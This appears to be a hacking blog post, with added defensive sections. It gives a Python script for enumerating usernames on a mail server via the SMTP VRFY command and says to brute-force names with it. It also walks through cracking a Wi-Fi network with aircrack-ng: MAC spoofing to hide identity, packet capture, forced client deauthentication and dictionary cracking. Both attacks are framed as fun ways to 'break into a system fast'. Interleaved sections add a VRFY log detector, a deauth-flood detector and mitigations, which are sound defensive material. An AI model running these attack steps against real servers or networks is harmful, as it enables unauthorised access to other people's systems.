Enumerating Windows usernames remotely is always fun. If you want to break into a system fast, see if SMTP is running. Most admins run SMTP on their servers.
Here is a simple script that will make this task easy. It opens a TCP connection to port 25, reads the server greeting, and sends a VRFY command for the username given on the command line:
import socket
import sys
if len(sys.argv) != 2:
    print("usage: %s <username>" % sys.argv[0])
    sys.exit(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('IPADDRESS', 25))   # replace IPADDRESS with the mail server's address
banner = s.recv(1024)          # read the SMTP greeting before sending anything
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)          # 250/550 vs. 252 is what tells you whether the user exists
print(result.decode(errors='replace'))
s.close()
Now all you have to do is run this with a simple bash script to brute force usernames.
Please be ethical with knowledge
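The flip side of the VRFY trick is that it is very noisy: one source address walking a wordlist through VRFY, getting a mix of 250 and 550 replies, stands out in any mail log. As an added example (not part of the original post, and not any MTA's own code), here is a small Python detector that flags that pattern. The log format it parses is a constructed, simplified one-line-per-command format made up for this example, so the regex would need adapting to a real server's logs; the window and threshold values are assumptions.

```python
import re
from collections import defaultdict

# Constructed, simplified log format for this example (one line per SMTP command);
# a real MTA writes different lines, so this regex is an assumption to adapt.
LOG_RE = re.compile(
    r'^(?P<ts>\d+) src=(?P<src>[\d.]+) cmd=(?P<cmd>\w+)'
    r'(?: arg=(?P<arg>\S+))? resp=(?P<resp>\d{3})$'
)

# Constructed sample: one client walking a wordlist with VRFY, two benign clients.
SAMPLE_LOG = """\
100 src=198.51.100.7 cmd=EHLO arg=mail.example.org resp=250
101 src=198.51.100.7 cmd=MAIL arg=from:<a@example.org> resp=250
110 src=203.0.113.5 cmd=VRFY arg=root resp=250
111 src=203.0.113.5 cmd=VRFY arg=admin resp=550
112 src=203.0.113.5 cmd=VRFY arg=alice resp=250
113 src=203.0.113.5 cmd=VRFY arg=bob resp=550
114 src=203.0.113.5 cmd=VRFY arg=carol resp=550
115 src=203.0.113.5 cmd=VRFY arg=dave resp=550
500 src=192.0.2.9 cmd=VRFY arg=postmaster resp=252
"""


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev['ts'] = int(ev['ts'])
    return ev


def detect_vrfy_enumeration(log_text, window=60, threshold=5):
    """Flag a source that probes at least `threshold` distinct usernames with VRFY
    inside any `window`-second span. Returns one alert per offending source."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev['cmd'] == 'VRFY':
            per_src[ev['src']].append(ev)

    alerts = []
    for src, events in per_src.items():
        events.sort(key=lambda e: e['ts'])
        start = 0
        for end, ev in enumerate(events):
            # slide the window start forward until it fits within `window` seconds
            while ev['ts'] - events[start]['ts'] > window:
                start += 1
            span = events[start:end + 1]
            probed = {e['arg'] for e in span}
            if len(probed) >= threshold:
                # a 250 reply means the server confirmed the account exists
                confirmed = sorted(e['arg'] for e in span if e['resp'] == '250')
                alerts.append({'src': src, 'probed': len(probed), 'confirmed': confirmed,
                               'first': span[0]['ts'], 'last': ev['ts']})
                break   # one alert per source is enough
    return alerts


if __name__ == '__main__':
    for a in detect_vrfy_enumeration(SAMPLE_LOG):
        print("VRFY enumeration from %(src)s: %(probed)d users probed, "
              "confirmed=%(confirmed)s, t=%(first)d..%(last)d" % a)
```

The cheaper fix is to not answer VRFY at all: Postfix, for instance, has `disable_vrfy_command = yes`, and most MTAs can be told to return a uniform 252 for every name, which removes the 250/550 difference the script above depends on.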
Cracking wireless is fun. It's like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC filtering, and other tweaks will not keep you safe.
# ifconfig -a
Find your WLAN interface.
# airmon-ng stop <wireless if>
# ifconfig <wireless if> down
# macchanger -m <mac to use in the xx:xx:xx:xx:xx:xx form> <wireless if>
We change our MAC to hide our identity and, if we want to, to bypass MAC filtering.
# airodump-ng <wireless if>
This will discover APs in the area. It's a really neat, powerful tool; play with it a little.
# airodump-ng --channel <channel> -w <file> --bssid <AP MAC in the form XX:XX:XX:XX:XX:XX> <wireless if>
This will capture packets to the file you specify for a specific AP (BSSID) on a specific channel.
In a new shell…
aireplay-ng -0 10 -a <AP MAC> -c <AP MAC> <wireless if>
Wait for the ACK packets. This will only work if there are active hosts on the AP.
Now crack the dump with a brute force attack
aircrack-ng <file> -w <dict file>
If you need a dict file there is an existing one in /pentest/wireless/cowpatty/dict
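The deauthentication step (aireplay-ng -0) is the loud part of this procedure: a burst of deauth frames aimed at one BSSID is exactly what a wireless IDS watches for. As an added example (not part of the original post, and not code from the aircrack-ng project), here is a minimal deauth-flood detector in Python that parses raw 802.11 management headers from a monitor-mode capture and flags a BSSID/receiver pair once enough deauth or disassociation frames arrive inside a short window. The frames it is fed are constructed in-memory test data, not captured packets, and the window and threshold values are assumptions.

```python
import struct
from collections import defaultdict

MGMT_TYPE = 0            # 802.11 frame type 0 = management
DISASSOC_SUBTYPE = 10    # management subtype 10 = disassociation
DEAUTH_SUBTYPE = 12      # management subtype 12 = deauthentication


def mac_str(raw):
    return ':'.join('%02x' % b for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(':'))


def parse_80211(frame):
    """Parse the 24-byte 802.11 MAC header, plus the reason code of a deauth/disassoc body.
    Returns None for frames too short to carry a full header."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                        # frame control byte 0: version | type | subtype
    info = {
        'type': (fc0 >> 2) & 0x3,
        'subtype': (fc0 >> 4) & 0xF,
        'da': mac_str(frame[4:10]),       # address 1: receiver
        'sa': mac_str(frame[10:16]),      # address 2: transmitter
        'bssid': mac_str(frame[16:22]),   # address 3: BSSID for management frames
    }
    if (info['type'] == MGMT_TYPE and info['subtype'] in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)
            and len(frame) >= 26):
        info['reason'] = struct.unpack_from('<H', frame, 24)[0]
    return info


def sample_deauth(bssid, target, reason=7):
    """Constructed in-memory test frame for feeding the detector (not a captured packet)."""
    fc = bytes([0xC0, 0x00])              # subtype 12, type 0, version 0; no flags
    return (fc + b'\x00\x00' + mac_bytes(target) + mac_bytes(bssid) + mac_bytes(bssid)
            + b'\x00\x00' + struct.pack('<H', reason))


def detect_deauth_flood(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_80211_bytes).
    Flags a (BSSID, receiver) pair once `threshold` deauth/disassoc frames fall within `window` seconds."""
    recent = defaultdict(list)
    flagged = set()
    alerts = []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        hdr = parse_80211(raw)
        if (hdr is None or hdr['type'] != MGMT_TYPE
                or hdr['subtype'] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)):
            continue
        key = (hdr['bssid'], hdr['da'])
        times = recent[key]
        times.append(ts)
        while ts - times[0] > window:     # drop frames that fell out of the window
            times.pop(0)
        if len(times) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append({'bssid': key[0], 'target': key[1], 'count': len(times),
                           'first_seen': times[0], 'last_seen': ts, 'reason': hdr.get('reason')})
    return alerts


def constructed_capture():
    """Constructed capture: a burst of broadcast deauths for one BSSID, plus benign/odd frames."""
    ap, other = 'aa:bb:cc:dd:ee:ff', '11:22:33:44:55:66'
    bcast = 'ff:ff:ff:ff:ff:ff'
    frames = [(i / 10, sample_deauth(ap, bcast)) for i in range(6)]      # six deauths in 0.5 s
    frames.append((2.0, bytes([0x08, 0x00]) + b'\x00' * 22 + b'payload'))  # a data frame, ignored
    frames.append((3.0, b'\x00\x00'))                                      # truncated frame, ignored
    frames += [(100.0, sample_deauth(other, bcast)), (200.0, sample_deauth(other, bcast))]
    return frames


if __name__ == '__main__':
    for a in detect_deauth_flood(constructed_capture()):
        print("deauth flood: bssid=%(bssid)s target=%(target)s count=%(count)d "
              "t=%(first_seen).1f..%(last_seen).1f reason=%(reason)s" % a)
```

Detection aside, the structural fix for this step is 802.11w (Protected Management Frames): with it enabled, the AP and clients authenticate deauth and disassociation frames, so forged ones are dropped instead of knocking clients off the network. In hostapd that is the `ieee80211w` setting (2 = required).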